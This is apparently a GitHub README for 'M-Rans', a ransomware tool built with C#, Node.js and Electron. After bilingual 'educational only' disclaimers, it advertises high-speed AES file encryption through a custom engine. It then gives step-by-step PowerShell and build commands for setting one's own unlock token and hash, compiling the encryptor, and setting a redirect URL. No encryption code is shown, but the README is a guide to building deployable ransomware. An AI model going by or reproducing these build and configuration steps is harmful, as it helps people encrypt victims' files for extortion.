Skip to content

northsia/M-Rans

Repository files navigation

M-Rans

M-Rans

  • ⚠️ Disclaimer :

I am not responsible for any illegal or inappropriate use of this application/program/tool. This software is provided for educational and research purposes only. Any use that violates laws or infringes on the rights of others is solely the responsibility of the user. I bear no legal or ethical responsibility for any damage or losses resulting from misuse.

This tool is specifically designed for learning and research purposes. It helps security experts and researchers verify the safety of applications and ensure they are free from malicious files.

Users must comply with local and international laws when using this software, and any violation of these laws is at their own risk.


- ⚠️ إخلاء مسؤولية : أنا غير مسؤول عن أي استخدام غير قانوني أو غير لائق لهذا التطبيق/البرنامج/الأداة. يتم توفير هذا البرنامج لأغراض تعليمية وتجريبية فقط، وأي استخدام يخالف القوانين أو ينتهك حقوق الآخرين يقع على عاتق المستخدم وحده. لا أتحمل أي مسؤولية قانونية أو أخلاقية عن أي ضرر أو خسائر تنجم عن إساءة الاستخدام. تم تصميم هذا خصيصا لاغراض التعلم و الابحاث , يساعد هذا المنشور الخبراء الامنين و باحثي الامن على التحقق من سلامة التطبيقات و خلوها من الملفات الضارة.

يجب على المستخدمين الالتزام بالقوانين المحلية والدولية عند استخدام هذا البرنامج، وأي انتهاك لتلك القوانين يكون على مسؤوليتهم الخاصة.


M-Rans | Ransomware "For security purposes only"

Caution

M-Rans is not for sale or use. It is designed solely for learning advanced malware techniques!


💡 Description:

M-Rans is an advanced ransomware tool built with C# and NodeJs by Meed.
It leverages the Electron.js framework for the user interface and .NET for core functionalities, while using optimized C++ functions to maximize performance.

The ransomware utilizes the robust AES encryption algorithm to securely encrypt files at exceptional speed.
Encryption is powered by M-Engine, a custom-built encryption engine designed and developed by Meed to deliver high-speed encryption while maintaining strong security standards.


🚀 Features:

  • 🔒 High-Speed AES Encryption: Ensures data security with minimal processing time.
  • Powered by M-Engine: A highly efficient encryption core developed from scratch.
  • 🖥️ Cross-Platform Support: Leverages Electron.js for a modern and responsive UI.
  • 🧩 Optimization: Uses C# functions for critical tasks to boost performance.
  • 🪟 Interactive User Interface: Clean and intuitive design for enhanced usability.

🛠️ Technologies Used:

  • Programming Languages: C#, NodeJs
  • Frameworks: Electron.js, .NET
  • Encryption Algorithm: AES (Advanced Encryption Standard)
  • Custom Engine: M-Engine (High-Speed Encryption)

🚨 Legal Notice:

M-Rans is a private tool intended solely for educational and research purposes.
Any unauthorized or malicious use of this tool is strictly prohibited and may result in severe legal consequences.
The developer does not assume responsibility for any misuse of this tool.


🛠️ Build : (Windows only "manual")

Clone Repo :

git clone https://github.com/h1ack/M-Rans.git

M-Rans:

cd M-Rans/M-Engine

Edit "NEW_BCRYPT_HASH" only !: (Recommanded : 'NEW_BCRYPT_HASH' make it same of 'YOUR_NEW_PASS_TOKEN')

(Get-Content config.cs) -replace '\$2a\$12\$xp7Fk0XBRwnxC1x4ibYFWe6sr..PFYkfLd0l/E060l27W4ggUrNVS', 'NEW_BCRYPT_HASH' | Set-Content config.cs

Edit "YOUR_NEW_PASS_TOKEN" only !:

(Get-Content config.cs) -replace 'PASS-KEY-HERE', 'YOUR_NEW_PASS_TOKEN' | Set-Content config.cs

build M-Engine:

dotnet build 

if error here make sure the paths is "./bin/Debug/netX.X/M-Engine.exe" copy M-Engine to resources:

Copy-Item -Path "./bin/Debug/netX.X/M-Engine.exe" -Destination "../resources"

make new REDIRECT_URL:

(Get-Content ./assetes/index-Ba9fV0lF.js) -replace 'https://h1ack.me', 'YOUR_NEW_REDIRECT_URL' | Set-Content ./assetes/index-Ba9fV0lF.js

final build:

npm run build # Build client - electron.js

📧 Contact:

For more information or educational inquiries, reach out to Meed.
email : meed@h1ack.me

M-Rans.